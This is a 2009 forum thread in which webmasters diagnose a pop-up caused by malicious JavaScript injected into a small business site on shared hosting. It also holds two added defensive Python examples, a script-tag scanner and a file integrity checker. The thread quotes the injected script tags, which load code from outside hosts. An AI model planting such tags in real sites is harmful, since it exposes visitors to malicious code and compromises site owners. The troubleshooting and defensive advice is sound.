help on adsrevenue.net pop up
elainec100@cheapaccounting
19th January 2009, 11:43
Any help please.
I am getting a pop up on my site for adsrevenue.net
Am running a full system scan at the moment - nothing showing so far
Assume I have a virus
Any ideas as to how to get rid of it please?
Subbynet
19th January 2009, 11:53
Hi,
I'm also seeing a pop up, so that indicates to me that it's likely someone has injected code into your site for the purpose of serving advertisements.
This line looks like the suspect.
<script type=text/javascript src=http://skaf.awardspace.info/49728baec2246.js></script>
(edit)
Forgot to add, it would be wise to audit your security to find out how they gained access to add this line of code.
wood1e2
19th January 2009, 12:09
I am confused, your site is adsrevenue.net? When I search for that I get this:
Targeted Online Pop-under Advertising Service (http://www.adsrevenue.net/)
Promote your business with today's most cost effective online advertising service: Pop-under ads, layer ads and banner ads.
www.adsrevenue.net (http://www.adsrevenue.net)
So I presume you should be pop-ups?
elainec100@cheapaccounting
19th January 2009, 12:10
thanks for that - have reported to my host provider 'names'!
Am still waiting for them to get back to me - so it is not my PC.
And this means that Names.co.uk have allowed this to happen?
wood1e2
19th January 2009, 12:11
Cancel that, mis-read the posting...the trouble is I am eating a salad and there is not enough meat in it...sending my brain into spasm!!
elainec100@cheapaccounting
19th January 2009, 12:12
I am confused, your site is adsrevenue.net? When I search for that I get this:
Targeted Online Pop-under Advertising Service (http://www.adsrevenue.net/)
Promote your business with today's most cost effective online advertising service: Pop-under ads, layer ads and banner ads.
www.adsrevenue.net (http://www.adsrevenue.net)
So I presume you should be pop-ups?
you are confusing me now?
my site is in my signature
wood1e2
19th January 2009, 12:15
Not sure if Names have allowed it to happen, presumably you or your designer place the coding there?
I only got the infected alert when I viewed your source, not when I viewed your website.
If you take the line out suggested then see if the virus is still there.
wood1e2
19th January 2009, 12:16
you are confusing me now?
my site is in my signature
Yeah I know, I mis-read your posting as I thought it said your website adsrevenue.net has some pop-ups!!
As I said, brain went into spasm
Subbynet
19th January 2009, 12:16
And this means that Names.co.uk have allowed this to happen?
They're not responsible for the security of your web application, only the server's security.
Without auditing it's impossible to tell the attack vector used to gain access, and who is to "blame".
stugster
19th January 2009, 12:17
We can guess though! :)
I'm going to say it's either:
a) The person who coded the PHP on your site...
b) you have a weak password/username and someone has changed the page using FTP
elainec100@cheapaccounting
19th January 2009, 12:18
well got a message last week after namesco ftp being hacked !!!!
Let me take the line out and see that happen but think the account ftp account has been hacked.
Best change all ftp passwords.
Thanks for your help - what a star
elainec100@cheapaccounting
19th January 2009, 12:19
We can guess though! :)
I'm going to say it's either:
a) The person who coded the PHP on your site...
b) you have a weak password/username and someone has changed the page using FTP
not 1 as it is me
it is 2 and the fault is at namesco
stugster
19th January 2009, 12:20
:D
That's £20 you owe me for that bet!
[Edit] I thought I had typed "My money's going to be on".... Looks like I didn't. Looks like you're in the clear ;)
Subbynet
19th January 2009, 12:23
not 1 as it is me
it is 2 and the fault is at namesco
Really if the answer is B, it's your fault. (and yes blaming people costs me customers lol :D) You should make sure to use secure usernames and passwords which are not easily guessed or attacked by brute force.
wood1e2
19th January 2009, 12:25
try using a third party ftp software rather than namesco's online ftp. Not sure it will make much difference in the future, but at least you won't be using a browser to ftp your website.
elainec100@cheapaccounting
19th January 2009, 12:28
try using a third party ftp software rather than namesco's online ftp. Not sure it will make much difference in the future, but at least you won't be using a browser to ftp your website.
I do! use a separate program
elainec100@cheapaccounting
19th January 2009, 12:29
Guys
Thanks for all your help. It is just funny that they send the mail out and then there is a problem.
Anyway I have checked the code to what is stored locally - can see this line in my code. Have reloaded and still getting the same problem.
Is it being called from else where? Any help - suggestions please?
stugster
19th January 2009, 12:31
Elaine, fire me the details for your site in an email and I'll take a look for you.
Stuart.Gilbertson AT EasyPCScotland.co.uk
elainec100@cheapaccounting
19th January 2009, 12:40
hey thanks for that but I have now found the little f***er.
had a few includes to go through
can you guys check me out now and see if it is ok
One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:
thanks guys
fab quick response and loads of help as usual
wood1e2
19th January 2009, 12:42
No little f**kers popping up at my end :)
zookx
19th January 2009, 21:21
hey thanks for that but I have now found the little f***er.
had a few includes to go through
can you guys check me out now and see if it is ok
One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:
thanks guys
fab quick response and loads of help as usual
The code should look something like
<script type=text/javascript
src=###########.reselecperu.com/49728b244045c.js></script>
If it's a template based site you have, i.e. WordPress, it will most likely be in the header, footer or wp-header file.
I've had this today with several sites I have with that host so I think you can be assured it's nothing related to your site or your code.
I contacted my host and they have said they were aware some sites had been infected and expected to have the problem solved within 24 hours. Personally I would have liked an email letting me know about the problem as soon as they were aware of it but there you go.
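Added example, not part of any post in this thread: a way to search a local copy of a site, includes and templates as well as pages, for script tags that load from hosts you did not put there. It handles the unquoted, line-wrapped form of the tag quoted above. The file extensions, the allowlist and the sample files are assumptions; the hosts in the samples are placeholders.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# <script ... src=VALUE>; VALUE may be quoted or unquoted, the tag may span lines
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".inc", ".tpl"}  # assumed file types

def external_scripts(text, allowed_hosts):
    """Return (line_no, url) for script tags loading from hosts not allowed."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        url = next(g for g in m.groups() if g is not None)
        try:
            host = urlparse(url).hostname   # None for relative (local) paths
        except ValueError:
            host = "unparseable"            # malformed URL: report it anyway
        if host and host not in allowed_hosts:
            hits.append((text.count("\n", 0, m.start()) + 1, url))
    return hits

def scan_tree(root, allowed_hosts):
    """Walk root and return (relative_path, line_no, url) for each finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings += [(rel, n, u) for n, u in external_scripts(fh.read(), allowed_hosts)]
    return sorted(findings)

def demo():
    """Scan a small constructed site tree (sample content, placeholder hosts)."""
    samples = {
        "index.php": '<?php include "inc/footer.inc"; ?>\n<script src="js/site.js"></script>\n',
        "inc/footer.inc": "<p>footer</p>\n<script type=text/javascript\nsrc=http://injected.example/0000.js></script>\n",
        "about.html": '<script src="https://cdn.example.org/lib.js"></script>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, {"cdn.example.org"})
```

Point `scan_tree` at a downloaded copy of the site, with the allowlist holding only the hosts you deliberately load scripts from; anything it reports in an include is a line to check against your own local source.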
elainec100@cheapaccounting
20th January 2009, 08:42
I have found this on another forum:
http://www.sheffieldforum.co.uk/showthread.php?p=4555518
Looks like the hosting company did know of the problem.
I feel a strong letter coming on :rolleyes:
stugster
20th January 2009, 09:04
Elaine,
I wouldn't waste your time writing the letter. They'll read it then bin it.
Stu
elainec100@cheapaccounting
20th January 2009, 09:11
good point well made - if they cared they would have told customers about this before.
wood1e2
20th January 2009, 09:18
I have tens of sites with namesco and have heard nothing...
stugster
20th January 2009, 09:20
I have tens of sites with namesco and have heard nothing...
To be fair to Namesco, they probably have loads of servers and it may only be a minority that were compromised. You may be one of the lucky few :)
wood1e2
20th January 2009, 09:24
this is true, compared to other hosting companies I have always found them really helpful...admittedly they are bigger now than when I first used them.
But still to be able to phone a worcester number and get the receptionist is lovely... :)
So I am surprised they have done nothing about this particular problem
GaryMc
20th January 2009, 09:56
it's impossible to tell the attack vector used to gain access
I'm having that one - should fit perfectly in to any meeting with senior management! :D
Subbynet
20th January 2009, 10:34
good point well made - if they cared they would have told customers about this before.
Unfortunately they don't care about your business, you are but one of probably thousands of sites which they host. Ultimately I believe it is not up to the Web host to protect your business, it is completely down to you to ensure the critical parts of your business are secure.
Your web hosts will take all the steps necessary to protect their own business.
When dealing with shared hosting you have to accept that you are at greater risk than you would be under dedicated managed hosting. Any one of the sites hosted on the same box as you could be vulnerable and allow an attacker access to that server which ultimately contains your website.
While the host does have responsibility for the server, it's effectively impossible for them to make sure every script (HTML/PHP etc) on that server hasn't been tampered with, in this example by adding JavaScript to launch a pop-up.
You can of course help protect yourself by running a file integrity checker on a daily or at least weekly basis. The file integrity checker will report to you any changes which have been made to the files, alerting you to malicious changes.
I'm having that one - should fit perfectly in to any meeting with senior management! :D
Haha :D Saying that "Senior Management" shouldn't ever take any decisions on IT Security. They never understand its worth or importance until it affects the bottom line, it's partly on the same lines that you thought something I said was funny ("oh yeah this guy's chatting bull**** type of thing"), when in fact I was serious about the matter.
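Added example, not part of the thread: the file integrity check described in the post above, reduced to a SHA-256 baseline of every file and a later comparison that lists what was added, removed or modified. The directory layout, file names and the simulated tampering are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile

def snapshot(root):
    """Map each file path (relative to root) to the SHA-256 of its contents."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return manifest

def compare(baseline, current):
    """Report files added, removed or modified since the baseline."""
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }

def write(root, rel, body):
    """Demo helper: create or overwrite a file under root."""
    os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
    with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
        fh.write(body)

def demo():
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as safe:
        write(site, "index.php", "<?php include 'inc/footer.inc'; ?>\n")
        write(site, "inc/footer.inc", "<p>footer</p>\n")
        write(site, "old.html", "<p>old page</p>\n")
        # Keep the baseline off the web server: anyone who can change the
        # site's files could otherwise rewrite the manifest as well.
        baseline_path = os.path.join(safe, "baseline.json")
        with open(baseline_path, "w", encoding="utf-8") as fh:
            json.dump(snapshot(site), fh)
        # Constructed tampering: an injected line, an unexpected file, a deletion.
        write(site, "inc/footer.inc",
              "<p>footer</p>\n<script src=http://injected.example/0.js></script>\n")
        write(site, "cache/x.php", "<?php /* unexpected file */ ?>\n")
        os.remove(os.path.join(site, "old.html"))
        with open(baseline_path, encoding="utf-8") as fh:
            return compare(json.load(fh), snapshot(site))
```

Run `snapshot` after each deliberate upload to refresh the baseline, and `compare` on the daily or weekly schedule the post suggests; any entry you cannot tie to your own change is worth opening.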